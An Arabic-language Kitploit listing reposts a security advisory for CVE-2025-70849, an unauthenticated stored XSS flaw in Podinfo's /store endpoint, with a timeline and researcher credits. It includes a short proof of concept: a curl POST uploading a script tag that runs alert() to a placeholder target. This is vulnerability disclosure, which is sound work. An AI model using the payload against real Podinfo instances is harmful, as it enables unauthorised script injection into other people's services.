Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-70849-Podinfo — إثبات المفهوم وإشعار أمني لـ CVE-2025-70849: XSS مخزنة بدون مصادقة في نقطة النهاية /store في Podinfo. | Kitploit
أدوات/GitHubGitHub/kazisabu/cve-2025-70849-podinfo
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubkazisabu/cve-2025-70849-podinfo

CVE-2025-70849-Podinfo

إثبات المفهوم وإشعار أمني لـ CVE-2025-70849: XSS مخزنة بدون مصادقة في نقطة النهاية /store في Podinfo.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-70849: ثغرة XSS مخزنة في Podinfo

ملخص

تم تحديد ثغرة أمنية (CWE-79) في Podinfo، وهو تطبيق ويب لتوضيح الخدمات المصغرة في Kubernetes. تسمح ميزة /store للمستخدمين غير الموثّقين برفع محتوى HTML/JS عشوائي، مما يؤدي إلى XSS مخزنة.

تفاصيل الثغرة

  • CVE ID: CVE-2025-70849
  • المنتج: Podinfo
  • النقطة المتأثرة: /store
  • نوع الثغرة: Cross-Site Scripting المخزنة (XSS)
  • الإصدارات المتأثرة: <= 6.10.0

دليل الإثبات (PoC)

  1. أرسل الحمولة الخبيثة:
    root@kitploit:~
    curl -X POST https://<target>/store -H "Content-Type: application/text" -d '<html><script>alert("CVE-2025-70849")</script></html>'
    
  2. قم بالوصول إلى الهاش المُرجَع: https:///store/

الجدول الزمني

  • الاكتشاف: سبتمبر 2025
  • إخطار البائع: 25 OCT 2025
  • رد البائع: تم الإقرار؛ ذُكر أنه لا يوجد جدول زمني حالي للإصلاح.
  • الإفصاح العام: فبراير 2026

إخلاء مسؤولية هذا البحث لأغراض تعليمية فقط.

الباحثون :

Kazi Sabbir | Shafayet Ahmed Alif

الشدة: Medium 6.4

تنزيل الأداة